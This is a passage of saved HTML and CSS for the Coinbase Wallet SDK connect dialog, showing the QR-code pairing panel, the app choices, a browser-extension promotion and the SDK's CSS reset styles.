              .-cbwsdk-css-reset .-cbwsdk-connect-item-copy-wrapper {
                margin: 0 4px 0 8px
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item-title {
                margin: 0 0 0;
                font-size: 16px;
                line-height: 24px;
                font-weight: 500
              }

              .-cbwsdk-css-reset .-cbwsdk-connect-item-description {
                font-weight: 400;
                font-size: 14px;
                line-height: 20px;
                margin: 0
              }
            </style>
            <div class="-cbwsdk-connect-content-header">
              <h2 class="-cbwsdk-connect-content-heading light">Scan to connect with one of our mobile apps</h2>
            </div>
            <div class="-cbwsdk-connect-content-layout">
              <div class="-cbwsdk-connect-content-column-left">
                <div>
                  <div class="-cbwsdk-connect-item light selected">
                    <div><img src="f0438febff768476c4bd646204034239a5fc20d9.svg" alt="Coinbase Wallet app"></div>
                    <div class="-cbwsdk-connect-item-copy-wrapper">
                      <h3 class="-cbwsdk-connect-item-title">Coinbase Wallet app</h3>
                      <p class="-cbwsdk-connect-item-description">Connect with your self-custody wallet</p>
                    </div>
                  </div>
                  <div class="-cbwsdk-connect-item light">
                    <div><img src="f9fa0444b908def7e2cacce9c162c39a60167a27.svg" alt="Coinbase app"></div>
                    <div class="-cbwsdk-connect-item-copy-wrapper">
                      <h3 class="-cbwsdk-connect-item-title">Coinbase app</h3>
                      <p class="-cbwsdk-connect-item-description">Connect with your Coinbase account</p>
                    </div>
                  </div>
                </div>
              </div>
              <div class="-cbwsdk-connect-content-column-right">
                <div class="-cbwsdk-connect-content-qr-wrapper"><img src="214776a4477416487e4634314779c77597edb59e.svg"
                    alt="QR Code"><input type="hidden" name="cbw-cbwsdk-version" value="3.6.6"><input type="hidden"
                    value="https://www.walletlink.org/#/link?id=ffead160155cc5e4d425fbef53539fdc&amp;secret=1af45d8d1b27e666a933d4d9ed1536e8f9dbb46c0dbd6920425567f7cd155d37&amp;server=https%3A%2F%2Fwww.walletlink.org&amp;v=3.6.6&amp;chainId=1">
                </div>
                <ol class="-cbwsdk-wallet-steps">
                  <li class="-cbwsdk-wallet-steps-item light">
                    <div class="-cbwsdk-wallet-steps-item-wrapper">Open Coinbase Wallet app</div>
                  </li>
                  <li class="-cbwsdk-wallet-steps-item light">
                    <div class="-cbwsdk-wallet-steps-item-wrapper"><span>Tap <strong>Scan</strong> </span><span
                        class="-cbwsdk-wallet-steps-pad-left -cbwsdk-wallet-steps-icon light"><svg width="10"
                          height="10" viewBox="0 0 10 10" xmlns="http://www.w3.org/2000/svg" fill="#FFFFFF">
                          <path d="M8.2271 1.77124L7.0271 1.77124V2.97124H8.2271V1.77124Z"></path>
                          <path
                            d="M5.44922 0.199219L5.44922 4.54922L9.79922 4.54922V0.199219L5.44922 0.199219ZM8.89922 3.64922L6.34922 3.64922L6.34922 1.09922L8.89922 1.09922V3.64922Z">
                          </path>
                          <path d="M2.97124 1.77124L1.77124 1.77124L1.77124 2.97124H2.97124V1.77124Z"></path>
                          <path
                            d="M0.199219 4.54922L4.54922 4.54922L4.54922 0.199219L0.199219 0.199219L0.199219 4.54922ZM1.09922 1.09922L3.64922 1.09922L3.64922 3.64922L1.09922 3.64922L1.09922 1.09922Z">
                          </path>
                          <path d="M2.97124 7.0271H1.77124L1.77124 8.2271H2.97124V7.0271Z"></path>
                          <path
                            d="M0.199219 9.79922H4.54922L4.54922 5.44922L0.199219 5.44922L0.199219 9.79922ZM1.09922 6.34922L3.64922 6.34922L3.64922 8.89922H1.09922L1.09922 6.34922Z">
                          </path>
                          <path
                            d="M8.89922 7.39912H7.99922V5.40112H5.44922L5.44922 9.79912H6.34922L6.34922 6.30112H7.09922V8.29912H9.79922V5.40112H8.89922V7.39912Z">
                          </path>
                          <path d="M7.99912 8.89917H7.09912V9.79917H7.99912V8.89917Z"></path>
                          <path d="M9.79917 8.89917H8.89917V9.79917H9.79917V8.89917Z"></path>
                        </svg></span></div>
                  </li>
                </ol>
              </div>
            </div>
          </div>
          <div class="-cbwsdk-try-extension light">
            <style>
              .-cbwsdk-css-reset .-cbwsdk-try-extension {
                display: flex;
                margin-top: 12px;
                height: 202px;
                width: 700px;
                border-radius: 12px;
                padding: 30px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension.light {
                background: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension.dark {
                background: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-column-half {
                flex: 50%
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-heading {
                font-style: normal;
                font-weight: 500;
                font-size: 25px;
                line-height: 32px;
                margin: 0;
                max-width: 204px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-heading.light {
                color: #0a0b0d
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-heading.dark {
                color: #fff
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-cta {
                appearance: none;
                border: none;
                background: none;
                color: #0052ff;
                cursor: pointer;
                padding: 0;
                text-decoration: none;
                display: block;
                font-weight: 600;
                font-size: 16px;
                line-height: 24px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-cta.light {
                color: #0052ff
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-cta.dark {
                color: #588af5
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-cta-wrapper {
                display: flex;
                align-items: center;
                margin-top: 12px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-cta-icon {
                display: block;
                margin-left: 4px;
                height: 14px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list {
                display: flex;
                flex-direction: column;
                justify-content: center;
                align-items: center;
                margin: 0;
                padding: 0;
                list-style: none;
                height: 100%
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item {
                display: flex;
                align-items: center;
                flex-flow: nowrap;
                margin-top: 24px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item:first-of-type {
                margin-top: 0
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-icon-wrapper {
                display: block
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-icon {
                display: flex;
                height: 32px;
                width: 32px;
                border-radius: 50%
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-icon svg {
                margin: auto;
                display: block
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-icon.light {
                background: #eef0f3
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-icon.dark {
                background: #1e2025
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-copy {
                display: block;
                font-weight: 400;
                font-size: 14px;
                line-height: 20px;
                padding-left: 12px
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-copy.light {
                color: #5b636e
              }

              .-cbwsdk-css-reset .-cbwsdk-try-extension-list-item-copy.dark {
                color: #8a919e
              }
            </style>
            <div class="-cbwsdk-try-extension-column-half">
              <h3 class="-cbwsdk-try-extension-heading light">Or try the Coinbase Wallet browser extension</h3>
              <div class="-cbwsdk-try-extension-cta-wrapper"><button
                  class="-cbwsdk-try-extension-cta light">Install</button>
                <div><svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"
                    class="-cbwsdk-try-extension-cta-icon" fill="#0052FF">
                    <path
                      d="M8.60675 0.155884L7.37816 1.28209L12.7723 7.16662H0V8.83328H12.6548L6.82149 14.6666L8 15.8451L15.8201 8.02501L8.60675 0.155884Z">
                    </path>
                  </svg></div>
              </div>
            </div>
            <div class="-cbwsdk-try-extension-column-half">
              <ul class="-cbwsdk-try-extension-list">
                <li class="-cbwsdk-try-extension-list-item">
                  <div class="-cbwsdk-try-extension-list-item-icon-wrapper"><span
                      class="-cbwsdk-try-extension-list-item-icon light"><svg width="14" height="14" viewBox="0 0 14 14"
                        xmlns="http://www.w3.org/2000/svg" fill="#0A0B0D">
                        <path
                          d="M1.8001 2.2002H12.2001V9.40019H1.8001V2.2002ZM3.4001 3.8002V7.80019H10.6001V3.8002H3.4001Z">
                        </path>
                        <path
                          d="M13.4001 10.2002H0.600098C0.600098 11.0838 1.31644 11.8002 2.2001 11.8002H11.8001C12.6838 11.8002 13.4001 11.0838 13.4001 10.2002Z">
                        </path>
                      </svg></span></div>
                  <div class="-cbwsdk-try-extension-list-item-copy light">Connect with dapps with just one click on your
                    desktop browser</div>
                </li>
                <li class="-cbwsdk-try-extension-list-item">
                  <div class="-cbwsdk-try-extension-list-item-icon-wrapper"><span
                      class="-cbwsdk-try-extension-list-item-icon light"><svg width="14" height="14" viewBox="0 0 14 14"
                        xmlns="http://www.w3.org/2000/svg" fill="#0A0B0D">
                        <path fill-rule="evenodd" clip-rule="evenodd"
                          d="M0.600098 0.600098V11.8001H13.4001V0.600098H0.600098ZM7.0001 9.2001C5.3441 9.2001 4.0001 7.8561 4.0001 6.2001C4.0001 4.5441 5.3441 3.2001 7.0001 3.2001C8.6561 3.2001 10.0001 4.5441 10.0001 6.2001C10.0001 7.8561 8.6561 9.2001 7.0001 9.2001ZM0.600098 12.6001H3.8001V13.4001H0.600098V12.6001ZM10.2001 12.6001H13.4001V13.4001H10.2001V12.6001ZM8.8001 6.2001C8.8001 7.19421 7.99421 8.0001 7.0001 8.0001C6.00598 8.0001 5.2001 7.19421 5.2001 6.2001C5.2001 5.20598 6.00598 4.4001 7.0001 4.4001C7.99421 4.4001 8.8001 5.20598 8.8001 6.2001Z">
                        </path>
                      </svg></span></div>
                  <div class="-cbwsdk-try-extension-list-item-copy light">Add an additional layer of security by using a
                    supported Ledger hardware wallet</div>
                </li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="-cbwsdk-snackbar-root">
    <div>
      <div class="-cbwsdk-snackbar-container">
        <style>
          .-cbwsdk-css-reset .-gear-container {
            margin-left: 16px !important;
            margin-right: 9px !important;
            display: flex;
            align-items: center;
            justify-content: center;
            width: 24px;
            height: 24px;
            transition: opacity .25s
          }

          .-cbwsdk-css-reset .-gear-container * {
            user-select: none
          }

          .-cbwsdk-css-reset .-gear-container svg {
            opacity: 0;
            position: absolute
          }

          .-cbwsdk-css-reset .-gear-icon {
            height: 12px;
            width: 12px;
            z-index: 10000
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar {
            align-items: flex-end;
            display: flex;
            flex-direction: column;
            position: fixed;
            right: 0;
            top: 0;
            z-index: 2147483647
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar * {
            user-select: none
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance {
            display: flex;
            flex-direction: column;
            margin: 8px 16px 0 16px;
            overflow: visible;
            text-align: left;
            transform: translateX(0);
            transition: opacity .25s, transform .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-header:hover .-gear-container svg {
            opacity: 1
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-header {
            display: flex;
            align-items: center;
            background: #fff;
            overflow: hidden;
            border: 1px solid #e7ebee;
            box-sizing: border-box;
            border-radius: 8px;
            cursor: pointer
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-header-cblogo {
            margin: 8px 8px 8px 8px
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-header * {
            cursor: pointer
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-header-message {
            color: #000;
            font-size: 13px;
            line-height: 1.5;
            user-select: none
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu {
            background: #fff;
            transition: opacity .25s ease-in-out, transform .25s linear, visibility 0s;
            visibility: hidden;
            border: 1px solid #e7ebee;
            box-sizing: border-box;
            border-radius: 8px;
            opacity: 0;
            flex-direction: column;
            padding-left: 8px;
            padding-right: 8px
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item:last-child {
            margin-bottom: 8px !important
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item:hover {
            background: #f5f7f8;
            border-radius: 6px;
            transition: background .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item:hover span {
            color: #050f19;
            transition: color .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item:hover svg path {
            fill: #000;
            transition: fill .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item {
            visibility: inherit;
            height: 35px;
            margin-top: 8px;
            margin-bottom: 0;
            display: flex;
            flex-direction: row;
            align-items: center;
            padding: 8px;
            cursor: pointer
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item * {
            visibility: inherit;
            cursor: pointer
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item-is-red:hover {
            background: rgba(223, 95, 103, .2);
            transition: background .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item-is-red:hover * {
            cursor: pointer
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item-is-red:hover svg path {
            fill: #df5f67;
            transition: fill .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item-is-red:hover span {
            color: #df5f67;
            transition: color .25s
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item-info {
            color: #aaa;
            font-size: 13px;
            margin: 0 8px 0 32px;
            position: absolute
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-hidden {
            opacity: 0;
            text-align: left;
            transform: translateX(25%);
            transition: opacity .5s linear
          }

          .-cbwsdk-css-reset .-cbwsdk-snackbar-instance-expanded .-cbwsdk-snackbar-instance-menu {
            opacity: 1;
            display: flex;
            transform: translateY(8px);
            visibility: visible
          }
        </style>
        <div class="-cbwsdk-snackbar"></div>
      </div>
    </div>
  </div>
</div>
<style type="text/css">
  @namespace svg "http://www.w3.org/2000/svg";

  .-cbwsdk-css-reset,
  .-cbwsdk-css-reset * {
    animation: none;
    animation-delay: 0;
    animation-direction: normal;
    animation-duration: 0;
    animation-fill-mode: none;
    animation-iteration-count: 1;
    animation-name: none;
    animation-play-state: running;
    animation-timing-function: ease;
    backface-visibility: visible;
    background: 0;
    background-attachment: scroll;
    background-clip: border-box;
    background-color: rgba(0, 0, 0, 0);
    background-image: none;
    background-origin: padding-box;
    background-position: 0 0;
    background-position-x: 0;
    background-position-y: 0;
    background-repeat: repeat;
    background-size: auto auto;
    border: 0;
    border-style: none;
    border-width: medium;
    border-color: inherit;
    border-bottom: 0;
    border-bottom-color: inherit;
    border-bottom-left-radius: 0;
    border-bottom-right-radius: 0;
    border-bottom-style: none;
    border-bottom-width: medium;
    border-collapse: separate;
    border-image: none;
    border-left: 0;
    border-left-color: inherit;
    border-left-style: none;
    border-left-width: medium;
    border-radius: 0;
    border-right: 0;
    border-right-color: inherit;
    border-right-style: none;
    border-right-width: medium;
    border-spacing: 0;
    border-top: 0;
    border-top-color: inherit;
    border-top-left-radius: 0;
    border-top-right-radius: 0;
    border-top-style: none;
    border-top-width: medium;
    box-shadow: none;
    box-sizing: border-box;
    caption-side: top;
    clear: none;
    clip: auto;
    color: inherit;
    columns: auto;
    column-count: auto;
    column-fill: balance;
    column-gap: normal;
    column-rule: medium none currentColor;
    column-rule-color: currentColor;
    column-rule-style: none;
    column-rule-width: none;
    column-span: 1;
    column-width: auto;
    counter-increment: none;
    counter-reset: none;
    direction: ltr;
    empty-cells: show;
    float: none;
    font: normal;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif;
    font-size: medium;
    font-style: normal;
    font-variant: normal;
    font-weight: normal;
    height: auto;
    hyphens: none;
    letter-spacing: normal;
    line-height: normal;
    list-style: none;
    list-style-image: none;
    list-style-position: outside;
    list-style-type: disc;
    margin: 0;
    margin-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    opacity: 1;
    orphans: 0;
    outline: 0;
    outline-color: invert;
    outline-style: none;
    outline-width: medium;
    overflow: visible;
    overflow-x: visible;
    overflow-y: visible;
    padding: 0;
    padding-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    page-break-after: auto;
    page-break-before: auto;
    page-break-inside: auto;
    perspective: none;
    perspective-origin: 50% 50%;
    pointer-events: auto;
    position: static;
    quotes: "\201C" "\201D" "\2018" "\2019";
    tab-size: 8;
    table-layout: auto;
    text-align: inherit;
    text-align-last: auto;
    text-decoration: none;
    text-decoration-color: inherit;
    text-decoration-line: none;
    text-decoration-style: solid;
    text-indent: 0;
    text-shadow: none;
    text-transform: none;
    transform: none;
    transform-style: flat;
    transition: none;
    transition-delay: 0s;
    transition-duration: 0s;
    transition-property: none;
    transition-timing-function: ease;
    unicode-bidi: normal;
    vertical-align: baseline;
    visibility: visible;
    white-space: normal;
    widows: 0;
    word-spacing: normal;
    z-index: auto
  }

  .-cbwsdk-css-reset strong {
    font-weight: bold
  }

  .-cbwsdk-css-reset * {
    box-sizing: border-box;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif;
    line-height: 1
  }

  .-cbwsdk-css-reset [class*=container] {
    margin: 0;
    padding: 0
  }

  .-cbwsdk-css-reset style {
    display: none
  }
</style>

</html>